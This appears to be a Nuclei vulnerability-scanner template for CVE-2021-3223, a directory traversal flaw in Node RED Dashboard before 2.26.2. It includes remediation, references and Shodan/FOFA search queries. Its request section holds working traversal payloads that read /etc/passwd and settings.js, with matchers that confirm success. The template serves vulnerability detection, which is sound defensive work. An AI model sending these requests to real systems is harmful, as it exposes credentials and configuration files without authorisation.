id: CVE-2021-3223

info:
  name: Node RED Dashboard <2.26.2 - Local File Inclusion
  author: gy741,pikpikcu
  severity: high
  description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability.
  reference:
    - https://github.com/node-red/node-red-dashboard/issues/669
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
    - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3223
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3223
    cwe-id: CWE-22
    epss-score: 0.11532
    epss-percentile: 0.9472
    cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nodered
    product: node-red-dashboard
    framework: node.js
    shodan-query: title:"Node-RED"
    fofa-query: title="Node-RED"
  tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js

http:
  - method: GET
    path:
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "Node-RED web server is listening"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a0047304502202fb62f3266472c890ecd0732b9785365754f12dff55d5f83c375328177aea05e022100abf898de29bce2da8cda654a5a2ec520e0bd1d9b9b27559563c2a389c535b3e5:922c64590222798bb761d5b6d8e72950